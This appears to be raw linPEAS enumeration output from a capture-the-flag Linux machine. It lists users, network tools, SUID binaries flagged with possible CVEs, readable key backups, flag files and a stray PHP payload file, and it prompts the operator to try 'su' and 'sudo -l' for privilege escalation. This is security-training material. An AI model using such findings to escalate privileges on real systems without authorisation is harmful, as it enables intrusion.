will     tty1         Thu Dec  3 02:12:09 2020 - down                      (00:01)     0.0.0.0
reboot   system boot  Thu Dec  3 02:10:54 2020 - Thu Dec  3 02:13:20 2020  (00:02)     0.0.0.0
will     pts/0        Thu Dec  3 01:38:38 2020 - Thu Dec  3 02:10:09 2020  (00:31)     192.168.153.128
will     tty1         Thu Dec  3 01:36:11 2020 - down                      (00:33)     0.0.0.0
reboot   system boot  Thu Dec  3 01:35:15 2020 - Thu Dec  3 02:10:09 2020  (00:34)     0.0.0.0
reboot   system boot  Thu Dec  3 01:34:30 2020 - Thu Dec  3 01:35:01 2020  (00:00)     0.0.0.0

wtmp begins Thu Dec  3 01:34:30 2020

╔══════════╣ Last time logon each user
Username         Port     From             Latest
root             tty1                      Thu Dec  3 03:25:38 +0000 2020
will             tty1                      Sat Dec 12 15:26:04 +0000 2020
mat              pts/1    192.168.153.128  Thu Dec  3 02:48:57 +0000 2020
toby             pts/1    192.168.153.128  Thu Dec  3 02:40:13 +0000 2020

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/lxc
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
/usr/share/gcc-8

╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.29 (Ubuntu)
Server built:   2020-08-12T21:33:25
httpd Not Found

Nginx version: nginx Not Found

/etc/apache2/mods-available/php7.2.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.2.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.2.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.2.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.2.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.2.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.2.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.2.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec  3  2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec  3  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec  3  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>


-rw-r--r-- 1 root root 1451 Dec  3  2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>
lrwxrwxrwx 1 root root 35 Dec  3  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>

-rw-r--r-- 1 root root 71817 Oct  7  2020 /etc/php/7.2/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71429 Oct  7  2020 /etc/php/7.2/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 14  2020 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Dec  3  2020 /etc/ldap


╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pollinate/entropy.ubuntu.com.pem
/var/lib/lxd/server.crt
2486PSTORAGE_CERTSBIN

══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Dec  3  2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar  4  2019 /etc/pam.d/sshd




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 2.6


/tmp/tmux-1000
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3517 Jun  3  2020 /etc/cloud/cloud.cfg
     lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Aug  6  2020 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 2796 Sep 17  2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Sep 17  2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Sep 17  2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Sep 17  2020 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Mar 21  2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21  2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21  2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22  2018 /usr/share/popularity-contest/debian-popcon.gpg

drwx------ 3 mat mat 4096 Dec  3  2020 /home/mat/.gnupg
drwx------ 3 toby toby 4096 Dec  3  2020 /home/toby/.gnupg
drwx------ 3 will will 4096 Dec  3  2020 /home/will/.gnupg


╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr  2  2018 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)


-rw-r--r-- 1 root root 69 Oct  7  2020 /etc/php/7.2/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Oct  7  2020 /usr/share/php7.2-common/common/ftp.ini






╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr  2  2018 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Apr  2  2018 /usr/share/bash-completion/completions/bind



╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 root adm 40588 Mar 15 21:35 /var/log/apache2/access.log

-rw-r----- 1 root adm 8400 Mar 15 21:35 /var/log/apache2/error.log

╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr  4  2018 /etc/skel/.bashrc
-rw-r--r-- 1 mat mat 3771 Dec  3  2020 /home/mat/.bashrc
-rw-r--r-- 1 toby toby 3771 Dec  3  2020 /home/toby/.bashrc
-rw-r--r-- 1 will will 3771 Dec  3  2020 /home/will/.bashrc





-rw-r--r-- 1 root root 807 Apr  4  2018 /etc/skel/.profile
-rw-r--r-- 1 mat mat 807 Dec  3  2020 /home/mat/.profile
-rw-r--r-- 1 toby toby 807 Dec  3  2020 /home/toby/.profile
-rw-r--r-- 1 will will 807 Dec  3  2020 /home/will/.profile



-rw-r--r-- 1 will will 0 Dec  3  2020 /home/will/.sudo_as_admin_successful



                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 44K Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 63K Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43K Sep 16  2020 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 27K Sep 16  2020 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 31K Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 19K Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37K Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 75K Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 44K Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59K Mar 22  2019 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 22K Mar 27  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 146K Jan 31  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 37K Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Mar 22  2019 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-- 1 root messagebus 42K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 111K Jul 10  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14K Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 427K Mar  4  2019 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root mlocate 43K Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 355K Mar  4  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14K Jan 17  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 39K Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 1 root utmp 10K Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3194 Mar 26  2018 sbin.dhclient
-rw-r--r-- 1 root root   125 Nov 23  2018 usr.bin.lxc-start
-rw-r--r-- 1 root root  2857 Apr  7  2018 usr.bin.man
-rw-r--r-- 1 root root 26245 Jul 10  2020 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  1550 Apr 24  2018 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1353 Mar 31  2018 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2023-03-15+22:32:58.8001830490 /var/lib/lxcfs/cgroup/memory/lxc/ignite/cgroup.event_control
2023-03-15+22:32:58.7213442420 /var/lib/lxcfs/cgroup/memory/lxc/cgroup.event_control
2023-03-15+22:32:58.5625305680 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
2023-03-15+22:32:58.5599319920 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
2023-03-15+22:32:58.4051499210 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
2023-03-15+22:32:58.2462940790 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
2023-03-15+22:32:58.2437717560 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
2023-03-15+22:32:58.0848844770 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
2023-03-15+22:32:57.9235909120 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
2023-03-15+22:32:57.7646404310 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
2023-03-15+22:32:57.6056322840 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
2023-03-15+22:32:57.6030087450 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
2023-03-15+22:32:57.4443690430 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.service/cgroup.event_control
2023-03-15+22:32:57.2895493890 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
2023-03-15+22:32:57.2869194760 /var/lib/lxcfs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control
2023-03-15+22:32:57.1273494540 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
2023-03-15+22:32:56.9632126360 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
2023-03-15+22:32:56.8075595890 /var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
2023-03-15+22:32:56.8048118850 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
2023-03-15+22:32:56.6450469500 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
2023-03-15+22:32:56.4851110880 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
2023-03-15+22:32:56.3254514960 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
2023-03-15+22:32:56.3228508690 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
2023-03-15+22:32:56.1638675950 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
2023-03-15+22:32:56.0048304480 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
2023-03-15+22:32:56.0021577060 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
2023-03-15+22:32:55.8471975750 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
2023-03-15+22:32:55.6880896490 /var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
2023-03-15+22:32:55.5291645600 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
2023-03-15+22:32:55.5265410710 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
2023-03-15+22:32:55.3674181970 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
2023-03-15+22:32:55.2082542080 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
2023-03-15+22:32:55.2056642170 /var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
2023-03-15+22:32:55.0463693230 /var/lib/lxcfs/cgroup/memory/system.slice/amazon-ssm-agent.service/cgroup.event_control
2023-03-15+22:32:54.8899644510 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
2023-03-15+22:32:54.7265763070 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
2023-03-15+22:32:54.4914567660 /var/lib/lxcfs/cgroup/memory/cgroup.event_control
2020-12-03+01:34:33.0902259270 /etc/console-setup/cached_setup_terminal.sh
2020-12-03+01:34:33.0862259270 /etc/console-setup/cached_setup_keyboard.sh
2020-12-03+01:34:33.0862259270 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x  3 root root 4096 Dec  3  2020 .
drwxr-xr-x 24 root root 4096 Dec 12  2020 ..
drwxrwx---  2 root adm  4096 Dec  3  2020 backups

╔══════════╣ Unexpected in root
/initrd.img.old
/vmlinuz
/vmlinuz.old
/initrd.img
/swap.img

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 36
drwxr-xr-x  2 root root 4096 Aug  6  2020 .
drwxr-xr-x 95 root root 4096 Dec 12  2020 ..
-rw-r--r--  1 root root   96 Sep 27  2019 01-locale-fix.sh
-rw-r--r--  1 root root  825 Jul 10  2020 apps-bin-path.sh
-rw-r--r--  1 root root  664 Apr  2  2018 bash_completion.sh
-rw-r--r--  1 root root 1003 Dec 29  2015 cedilla-portuguese.sh
-rw-r--r--  1 root root 1557 Dec  4  2017 Z97-byobu.sh
-rwxr-xr-x  1 root root  873 Jun  3  2020 Z99-cloudinit-warnings.sh
-rwxr-xr-x  1 root root 3417 Jun  3  2020 Z99-cloud-locale-test.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/mat/.bash_history
/home/ftpuser
/home/ftpuser/ftp/flag_2.txt
/home/toby/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/bunch.php
/var/www/html/css
/var/www/html/css/bootstrap.min.css.map
/var/www/html/css/bootstrap.min.css
/var/www/html/round.php
/var/www/html/.htaccess
/var/www/html/robots.txt
/var/www/html/secret_file_do_not_read.txt
/var/www/html/striped.php
/var/www/html/more_secrets_a9f10a
/var/www/html/more_secrets_a9f10a/flag_3.txt
/var/www/html/images
/var/www/html/images/placemat1.jpg
/var/www/html/images/placemat2.jpg
/var/www/html/images/placemat3.jpg
/var/www/html/flag_1.txt
/var/www/html/post.php
/var/www/html/index.php

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/mat/scripts

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-rw---- 1 root adm 2270 Dec  3  2020 /opt/backups/key.b64
-rw-r----- 1 root adm 40588 Mar 15 21:35 /var/log/apache2/access.log
-rw-r----- 1 root adm 8400 Mar 15 21:35 /var/log/apache2/error.log
-rw-r----- 1 root adm 0 Dec  3  2020 /var/log/apache2/other_vhosts_access.log
-rw-r----- 1 root adm 28898 Dec 12  2020 /var/log/apt/term.log

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/cow.jpg
/var/log/journal/ec6c05333ff74080b8bd26a785d12724/system.journal
/var/log/auth.log
/var/log/syslog

logrotate 3.11.0

╔══════════╣ Files inside /home/mat (limit 20)
total 312
drwxr-xr-x 6 mat  mat    4096 Dec  3  2020 .
drwxr-xr-x 6 root root   4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root      9 Dec  3  2020 .bash_history -> /dev/null
-rw-r--r-- 1 mat  mat     220 Dec  3  2020 .bash_logout
-rw-r--r-- 1 mat  mat    3771 Dec  3  2020 .bashrc
drwx------ 2 mat  mat    4096 Dec  3  2020 .cache
-rw-r--r-- 1 mat  mat  270433 Dec  3  2020 cow.jpg
-rw------- 1 mat  mat      37 Dec  3  2020 flag_5.txt
drwx------ 3 mat  mat    4096 Dec  3  2020 .gnupg
drwxrwxr-x 3 mat  mat    4096 Dec  3  2020 .local
-rw-r--r-- 1 will will    141 Dec  3  2020 note.txt
-rw-r--r-- 1 mat  mat     807 Dec  3  2020 .profile
drwxrwxr-x 3 will will   4096 Mar 15 21:59 scripts

╔══════════╣ Files inside others home (limit 20)
/home/mat/cow.jpg
/home/mat/note.txt
/home/mat/scripts/__pycache__/cmd.cpython-36.pyc
/home/mat/scripts/cmd.py
/home/mat/.bashrc
/home/mat/.bash_logout
/home/mat/flag_5.txt
/home/mat/.profile
/home/ftpuser/ftp/flag_2.txt
/home/ftpuser/ftp/files/payload_ivan.php
/home/toby/jobs/cow.sh
/home/toby/note.txt
/home/toby/.bashrc
/home/toby/flag_4.txt
/home/toby/.bash_logout
/home/toby/.profile
/var/www/html/bunch.php
/var/www/html/css/bootstrap.min.css.map
/var/www/html/css/bootstrap.min.css
/var/www/html/round.php

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 5850 Feb  5  2018 /etc/vsftpd.conf.bak
-rw-r--r-- 1 root root 2765 Aug  6  2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 7857 Dec  9  2020 /lib/modules/4.15.0-128-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 Dec  9  2020 /lib/modules/4.15.0-128-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7857 Nov 23  2020 /lib/modules/4.15.0-126-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 7905 Nov 23  2020 /lib/modules/4.15.0-126-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 11755 Dec  3  2020 /usr/share/info/dir.old
-rw-r--r-- 1 root root 1397 Aug  6  2020 /usr/share/sosreport/sos/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
-rw-r--r-- 1 root root 1758 Mar 24  2020 /usr/share/sosreport/sos/plugins/ovirt_engine_backup.py
-rwxr-xr-x 1 root root 226 Dec  4  2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 2746 Jan 23  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 361345 Feb  2  2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Nov  7  2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 35544 Mar 25  2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 217469 Nov 23  2020 /usr/src/linux-headers-4.15.0-126-generic/.config.old
-rw-r--r-- 1 root root 0 Nov 23  2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Nov 23  2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 217469 Dec  9  2020 /usr/src/linux-headers-4.15.0-128-generic/.config.old
-rw-r--r-- 1 root root 0 Dec  9  2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Dec  9  2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/net/team/mode/activebackup.h

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission


╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Dec  3  2020 .
drwxr-xr-x 14 root root 4.0K Dec  3  2020 ..
drwxr-xr-x  5 root root 4.0K Dec  3  2020 html

/var/www/html:
total 60K
drwxr-xr-x 5 root root 4.0K Dec  3  2020 .
drwxr-xr-x 3 root root 4.0K Dec  3  2020 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Apr  4  2018 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug  6  2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 1531 Dec  3  2020 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 root root 20 Mar 15 21:20 /run/cloud-init/.instance-id
-rw-r--r-- 1 root root 2 Mar 15 21:19 /run/cloud-init/.ds-identify.result
-rw-r--r-- 1 mat mat 220 Dec  3  2020 /home/mat/.bash_logout
-rw-r--r-- 1 will will 220 Dec  3  2020 /home/will/.bash_logout
-rw-r--r-- 1 toby toby 220 Dec  3  2020 /home/toby/.bash_logout
-rw-r--r-- 1 landscape landscape 0 Aug  6  2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 47 Dec  3  2020 /var/www/html/.htaccess

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 mat mat 270433 Mar 15 22:43 /tmp/cow.jpg
-rwxr-xr-x 1 will will 828098 Feb 10 20:38 /tmp/linpeas.sh
-rw-rw---- 1 root adm 2270 Dec  3  2020 /opt/backups/key.b64
-rw-r--r-- 1 root root 31202 Dec 12  2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 3363 Dec  3  2020 /var/backups/apt.extended_states.1.gz

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/will
/home/will/.bash_logout
/home/will/.bashrc
/home/will/.cache
/home/will/.cache/motd.legal-displayed
/home/will/.config
